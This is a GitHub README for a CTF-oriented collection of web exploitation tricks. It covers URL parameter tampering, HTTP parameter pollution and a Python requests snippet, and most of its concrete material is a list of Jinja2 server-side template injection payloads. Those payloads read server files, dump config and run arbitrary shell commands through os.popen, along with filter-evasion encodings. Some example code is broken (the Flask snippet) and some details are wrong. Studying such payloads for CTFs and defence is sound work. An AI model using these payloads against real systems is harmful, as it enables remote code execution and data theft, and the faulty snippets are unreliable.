Skip to content

Latest commit

 

History

History
265 lines (209 loc) · 14.1 KB

README.md

File metadata and controls

265 lines (209 loc) · 14.1 KB

Tricks in web exploiting

Open Source Love License

This repository aims to simplify and help to make payload for web exploiting easier, most situations are based on CTFs. If you are looking for some tricky methods, hope you enjoy !!


Table of contents


Introduction

What is actually hacking?

Hack is simple, you may hacked something before, go to Google and find lifehack, there are many videos about it. So how to define hacking?

  • Understanding how objects work thoroughly to use in creative, smart way to archive any purpose (bad or good). - CyberJutsu team.
  • Hacking is solving problems in ways unimaginable for those confined to conventional thinking and methodologies. - Hacking: The Art Exploitation book.

Where should I start?

Follow the meaning of hacking, you should know what you want to hack. For example, you want to hack website. You must know how websites work? Including the method the packets are sent from client to server, the technology for hosting websites like apache tomcat server or what language for building website: PHP or Javascript, what weird behaviors of websites, and so on.

But how to choose suit field in cyber security start? It is simple answer, try all and feel, you wil learn a lot of new things. Moreover, you can join in some live events which give you fundamental knowledge. Play some CTFs and know what skills you need to improve for your career. Besides, find a team having same hobby is a good choice to keep your effort when you are stuck in your career.

Understand nature of object, make hypothesis, and try to find the most efficient way for hacking.

User Input

The basic thing getting data, users will type their information, or what they want to find. In the cyber field, untrusted(external) data is the most markable thing - hard to control, know. Every request can include malicious requests - it can determine all systems, so that "never trust user input". Where can users change, type, upload, etc. These are etry points hackers can exploit.

Hacking mindset

How to make hacking become easier? You need to improve hacking mindset which similar to critical thinking. You shouldn't ask like this: "How to hack this website?", it is close answer and hard to find what you need. Insteadly, you can ask like: "What technology of this website?", "Does this library have any vulnerabilities recorded in the past?",... Practicing more and it will help you better day by day. How many methods to access, utility inverse ratio with security, every language code has specifically vulnerable, including the library, from users, frontend, backend to database. Always ask how to exploit, and how many possible methods to do.

How to learn security? learn pre-knowledge, know "how's it work?", know detail of the website, think creatively, and practice.

What is purpose of this repo?

This repo is mainly sharing some tricks for solving popular vulnerabilities (almost come from CTFs). May it can help you to improve your knowledge about hacking. Moreover, it comes with some basic define. Somethings in this repo maybe not true or out-of-date, feel free pull request to make it better.

Understand the mechanism will help you go far in the future.


URL

What is URL?

A uniform resource locator, or URL, is a short string containing an address which refers to an object in the "web." URLs are a subset of URIs. Moreover, it can be used for GET request with modify parameter, see more here. In fact, some specific characters are encoded, there is rules you can find query here.

So let's talk into main part, here the sample querry: https://example.com/?querry=test&querry2=test2 that you can send value querry with test. So how can you exploit? Just modify parameter whatever you like to get information which bases on your code.

<?php
    if($_GET['get']=="abc") echo ("Hacked");
    else echo("Wrong");
?>

Here is sample php code, the aim of this is print Hacked when $_GET['get']=="abc", GET method can be found here, so the solution is https://example.com/?get=abc. Other parameters come with code:

Ex1

<?php
    if($_GET['ip']==$_SERVER['REMOTE_ADDR']) echo ("Hacked");
    else echo("Wrong");
?>

Solution: https://example.com/?ip=<your-ipv4> you can find your ip here.

Ex2:

#!/usr/bin/env python3

from flask import Flask, render_template_string, request, Response
app = Flask(__name__)

@app.route('/')

def index():

    return Response(open(__file__).read(), mimetype='text/plain' )

@app.route('/ssti')
    def ssti():

    query = request.args['query'] ifquery' in request.args else '...

    if len(query) > 48:
        return "Too long!"
        return render_template_string(query)

app.run('@.0.0.0', 1337)

It is quite complex, you must find the variable can be exploited, query = request.args['query'] so query can be used for parameter, but look request.args['query'] is same method GET but it must come with name of its function so the solution is https://example.com/ssti?query=<your-payload>.

Some filter url

In fact, you can see changes in URL when you submit form or somethings else.

For example: example.com/?id=123 you query the id of something, maybe the code inside this like:

SELECT Storage FROM User WHERE id = "123" - it is simple query in SQL (Moreover, there are many injection types), but may it can lead to SQL Injection (it can leak user data from database) but SQL Injection will talk in next session. Some popular is Quote, Space, --

Http parameter pollution

The previous part show you how can send value with changing url parameter so what will happen when you send multiple same value like https://example.com/?color=red&color=blue? The result will be red or blue or both of them. It depend on your language used and type of server. For example:

  • if your server use JSP with Tomcat server, result is red - first value;
  • PHP with Apache, result is blue - second one;
  • ASP with IIS, reusult will be both of them.

Because requests become messy so that we can inject malicious code to: alter behavior of website, exploit, bypass WAF, change input value, etc. There are 2 methods to use this: Server-Side and Client-Side.

Server-Side HPP

When you send request to server, not only server return text on website but also it may return some result of code. Here is example: https://www.example.com/transfer?from=123&to=456&amount=5000 - the aim of this url is transfer money from alice to bob, so lets mess order of parameter https://www.example.com/transfer?from=123&to=456&amount=5000&from=789.

Here is code inside server:

        user.account = 123
        
        def prepare_transfer(params)
            params << user.account
            transfer_money(params) #user.account (123) is params[2]
            end
        
        def transfer_money(params)
            to = params[0]
            amount = params[1]
            from = params[2]
            transfer(to,amount,from)
            end

So how it works? prepare_transfer get 1 array called params including parameter to and amount from url, the array will be [456, 5000]. The first line user.account = 123 will push back value into array [456, 5000, 123] then params move to transfer_money. The order of array is to account -> amount money -> from account, lets change order of parameter, https://www.bank.com/transfer?to=456&amount=5000&from=789: the array is [456, 5000, 789, 123], follow order of array, the money for 789 will send to 456.

Client-Side HPP

Here is url: http://host/page.php?par=123%26action=edit and code inside:

 <? $val=htmlspecialchars($_GET['par'],ENT_QUOTES); ?>
   <a href="/page.php?action=view&par='.<?=$val?>.'">View Me!</a>

Technique

Including some interesting methods for helping to solve CTFs challenges .


Snippets

Sample codes using for multiple purposes, make web exploitation become easier.

Request

You can send payload to server with python and get data from it. Why use Python? In this part, we will use request library for python.

Firstly, you must install it on computer with command: pip install requests. Example:

    import requests
    #value1 and value2 must be string or character
    param = {'1':value1,'2':value2} #change '1' and '2' depend parameter of website
    x = requests.get('https://example.com', params=param)
    x.text() # here is response, text is show raw output

The above using method GET, if you want to use method POST, change it to post: requests.post. Moreover, there is other responses you can try:

  • status_code(): it will show you a number in range 200-29.
  • json(): show data of website's json.

SSTI

What is ssti?

It means server-side template injection, occurs when an attacker is able to use native template syntax to inject a malicious payload into a template. Find more here


Jinja2

It is template engine of Flask framework (Python), you can find more here

Some popular payload:

  • Test ssti is working or not:{{7*7}} or {{7*'7'}}
  • Read config file of server{{config.items()}} or {{config}} or {% print config %}
  • Open file at path <path/of/file>:
    • {{ ''.__class__.__mro__[2].__subclasses__()[40]('<path/of/file>').read() }}
    • {{get_flashed_messages.__globals__.__builtins__.open("<path/of/file>").read()}}
    • {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("<path/of/file>").read() }}
  • Open file flag (using filter pass below):
    • {{lipsum.__globals__.__getitem__(dict(os=x)|first).popen((dict(cat=x)|first)+(dict(fl=x)|first|indent((dict(bla=x)|first)|length,true))+(dict(ag=x)|first)).read()}}
    • {{lipsum.__globals__[dict(__buil=anh,tins__=to)|join][dict(op=pro,en=wa)|join](dict(fl=a,ag=b)|join).read()}}
    • {{url_for.__globals__.os.popen((((dict(c=x,a=x,t=x)|list)|join)|center)+(dict(fl=x,ag=x)|list)|join).read()}}
    • {{get_flashed_messages.__globals__.__builtins__.open([].__doc__[-[[],[],[],[],[]].__len__()]+().__doc__[[[],[],[]].__len__()]+().__add__.__name__[[[],[]].__len__()]+().__gt__.__name__[[[],[]].__len__()]).read()}}
  • Execute <cmd>:
    • {{lipsum.__globals__.os.popen('<cmd>').read()}}
    • {{cycler.__init__.__globals__.os.popen('<cmd>').read()}}
    • {{joiner.__init__.__globals__.os.popen('<cmd>').read()}}
    • {{namespace.__init__.__globals__.os.popen('<cmd>').read()}}
    • {{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('<cmd>').read()}}
    • {{self._TemplateReference__context.joiner.__init__.__globals__.os.popen('<cmd>').read()}}
    • {{self._TemplateReference__context.namespace.__init__.__globals__.os.popen('<cmd>').read()}}
  • Update config:
    • {% set x=config.update(l=lipsum) %}

Some popular filter:

  • {{ }}: or some similar synstax (open synstax), you can use other methods such as {% %}

  • [a-Z]: include some specific letter like: flag, cat, etc. You can change with magic python mechanism.

    • a: ().__add__.__name__[2] or ().__add__.__name__[-5]
    • d: ().__add__.__name__[-3]
    • f: [].__doc__[-5]
    • g: ().__gt__.__name__[2] or ().__gt__.__name__[-4]
    • l: ().__doc__[3] or ().__add__.__name__[3]
    • i: ().__doc__[2]
    • j: ().__doc__[5]
    • t: ().__gt__.__name__[3] or ().__gt__.__name__[-3]
    • u: ().__doc__[1]
    • os: dict(os=x)|first
  • [0-9]: include decimal numbers, if you face with problems having above filter, free for combining them.

    • 0: [].__len__()
    • 1: [[]].__len__()
    • 2: [[],[]].__len__()
    • 3: [[],[],[]].__len__()
    • 4: [[],[],[],[]].__len__()
    • 5: [[],[],[],[],[]].__len__()
    • 6: [[],[],[],[],[],[]].__len__()
    • 7: [[],[],[],[],[],[],[]].__len__()
    • 8: [[],[],[],[],[],[],[],[]].__len__()
    • 9: [[],[],[],[],[],[],[],[],[]].__len__()
  • ': use dict() instead

  • : blank or space, use indent()

  • _: moving string over request.args: {% set x = config.update(g=request.args.a) %}, then send request payload=<payload>&a=__globals__

  • Other filter: using unicode encoder here

  • Others can be found here


Injection

SQL Injection

How SQL work

Reference source


tags: CTFs Web Exploit